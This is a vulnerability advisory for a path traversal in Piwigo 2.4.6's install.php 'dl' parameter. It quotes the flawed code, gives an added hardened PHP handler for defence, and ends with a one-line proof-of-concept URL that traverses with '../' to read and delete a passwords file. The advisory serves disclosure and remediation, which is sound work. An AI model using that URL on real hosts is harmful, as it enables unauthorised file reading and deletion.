Piwigo is a photo gallery script written in PHP.

Piwigo 2.4.6 and other versions do not properly validate the value of the 'dl' parameter of the install.php script. Because of this implementation flaw, an attacker can read arbitrary files on the affected host and delete arbitrary files within the context of the affected application.
====================================================================
/install.php (lines 113-124):
-------------
if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
{
  $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
  header('Cache-Control: no-cache, must-revalidate');
  header('Pragma: no-cache');
  header('Content-Disposition: attachment; filename="database.inc.php"');
  header('Content-Transfer-Encoding: binary');
  header('Content-Length: '.filesize($filename));
  echo file_get_contents($filename);
  unlink($filename);
  exit();
}
====================================================================
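The code above concatenates the user-controlled 'dl' value into a filesystem path, so a value containing "../" sequences walks out of the data directory, and the same path is then passed to both file_get_contents() and unlink(). The hardened handler below is an added example written for this page; it is not Piwigo's own code and not the vendor patch referenced further down. It assumes PHPWG_ROOT_PATH and $conf['data_location'] are defined as in install.php, and it assumes (a choice made here, not documented by the page) that a legitimate 'dl' value is a short alphanumeric token. The helper name pwg_download_path_or_null is hypothetical.

```php
<?php
// Added hardening example (not Piwigo's code, not the vendor patch).
// Assumes PHPWG_ROOT_PATH and $conf['data_location'] exist as in install.php.

/**
 * Returns the canonical path of the download file for token $dl, or null
 * if the token is malformed or the resolved file is outside $data_dir.
 */
function pwg_download_path_or_null(string $dl, string $data_dir): ?string
{
  // 1. Syntactic allow-list: the expected value is a plain token, so any
  //    '/', '\', '.', NUL or other metacharacter is rejected outright.
  //    (Assumption: legitimate tokens are alphanumeric/underscore, <= 64 chars.)
  if (!preg_match('/^[A-Za-z0-9_]{1,64}$/', $dl)) {
    return null;
  }

  // 2. Canonicalise both sides and require containment, so the final path
  //    cannot escape the data directory even via symlinks or odd normalisation.
  $base      = realpath($data_dir);
  $candidate = realpath($data_dir . DIRECTORY_SEPARATOR . 'pwg_' . $dl);
  if ($base === false || $candidate === false) {
    return null;
  }
  if (strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0) {
    return null;
  }

  // 3. Serve only regular files that still carry the expected prefix.
  if (!is_file($candidate) || strpos(basename($candidate), 'pwg_') !== 0) {
    return null;
  }
  return $candidate;
}

if (!empty($_GET['dl'])) {
  $data_dir = PHPWG_ROOT_PATH . $conf['data_location'];
  $filename = pwg_download_path_or_null((string) $_GET['dl'], $data_dir);

  if ($filename === null) {
    // Reject instead of silently falling through; nothing is read or unlinked.
    http_response_code(400);
    exit('invalid download token');
  }

  header('Cache-Control: no-cache, must-revalidate');
  header('Pragma: no-cache');
  header('Content-Disposition: attachment; filename="database.inc.php"');
  header('Content-Transfer-Encoding: binary');
  header('Content-Length: ' . filesize($filename));
  readfile($filename);   // streams the file without loading it fully into memory

  // Only the validated, contained path is ever deleted.
  unlink($filename);
  exit();
}
```

The allow-list in step 1 alone already blocks traversal; the realpath() containment check in step 2 is kept as defence in depth so that a later relaxation of the regex, or a symlink placed in the data directory, still cannot turn this handler into a file-read or file-delete primitive.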

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                         @zeroscience

Advisory ID: ZSL-2013-5127
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
Vendor Patch: http://piwigo.org/bugs/view.php?id=2843

15.02.2013

--

http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt